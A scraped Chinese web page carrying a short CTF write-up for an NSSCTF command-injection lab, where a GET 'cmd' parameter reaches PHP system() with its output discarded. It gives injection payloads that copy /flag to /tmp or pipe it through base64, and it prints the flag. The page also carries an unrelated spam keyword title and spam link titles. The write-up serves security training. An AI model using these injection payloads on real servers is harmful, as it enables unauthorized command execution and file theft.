当前位置: 首页 > news >正文

郑州专业网站设计磁力狗

郑州专业网站设计,磁力狗,做网站需要的技术 规范,87网站建设工作室开启靶场,打开链接: GET传参cmd system($cmd.">/dev/null 2>&1"); 这行代码将执行命令 $cmd,并且将其标准输出和标准错误输出都重定向到 /dev/null,这意味着无论命令的输出还是可能产生的错误信息都不会显示…

开启靶场,打开链接:

GET传参cmd

system($cmd.">/dev/null 2>&1");

这行代码将执行命令 $cmd,并且将其标准输出和标准错误输出都重定向到 /dev/null,这意味着无论命令的输出还是可能产生的错误信息都不会显示出来

> /dev/null 是一个输出重定向,它把标准输出重定向到 /dev/null,这样就不会有输出出现在屏幕上。

2>&1 是另一个重定向操作,它把标准错误输出复制到之前的标准输出位置(即 /dev/null),这样标准错误也不会出现在屏幕上。


可以尝试将cat /flag的输出重定向到一个临时文件中,然后再通过其他命令读取这个临时文件的内容:

1、创建临时文件:

cat /flag > /tmp/temp_flag

2、读取临时文件内容:

cat /tmp/temp_flag

3、将这两个命令组合起来,可以构造如下命令:

cat /flag > /tmp/temp_flag; cat /tmp/temp_flag;

4、构造payload:

/?cmd=cat /flag > /tmp/temp_flag; cat /tmp/temp_flag;

成功得到flag:

NSSCTF{bcc499e2-7305-4f60-9c5b-6280b8889896}


当然,还有一种思路:

使用base64命令将/flag的内容编码成Base64格式,然后通过管道输出。由于base64编码会将输出转换成ASCII格式,可以通过网络更容易地传输。

1、将内容编码为Base64:

cat /flag | base64

2、构造payload:

/?cmd=cat /flag | base64;

一样成功得到flag

http://www.dt0577.cn/news/41652.html

相关文章:

  • 做网站怎么qq邮箱验证随州今日头条新闻
  • 扬中网站建设推广网络营销专业如何
  • 有人用公司名字做网站 怎么维权网站宣传推广方案
  • php做网站的优势营销培训心得体会
  • asp网站开发四酷全书网络营销介绍
  • 网站建设与网页设计考试题百度关键字搜索排名
  • 时尚大气网站seo优化专家
  • 台州网站制作建设私人做网站
  • 宁夏建设工程造价网站郴州seo快速排名
  • 百度网站建设是什么广东近期新闻
  • 做课内教学网站为什么不建议去外包公司上班
  • 网页制作与网站建设实战大全网络平台有哪些?
  • 怎么查看网站是什么软件做的dw网页制作详细步骤
  • 做网站如何变现互联网营销外包公司
  • 个人简历模板免费网站seo怎么学在哪里学
  • 如何建立公司网站是什么百度关键词在线优化
  • 网上免费注册qq网站手机优化游戏性能的软件
  • 深圳有哪些网站开发公司佛山做seo推广公司
  • 网站做测试怎样做电商代运营公司十强
  • 网站右下角弹窗代码重庆镇海seo整站优化价格
  • 设计一个网站报价百度的营销推广模式
  • 基本网站建设技术无锡做网站的公司
  • 文员做任务赚钱的网站seo快速排名软件平台
  • b s文件下载网站开发aso安卓优化公司
  • 公司网站模板怎么做seo网站优化网站编辑招聘
  • 域名和网站空间seo推广系统排名榜
  • 成都工商注册查询宁波seo关键词如何优化
  • 做产品设计之前怎么查资料国外网站哈尔滨seo优化
  • 手表网网站高端网站建设案例
  • wordpress多语言生成工具克州seo整站排名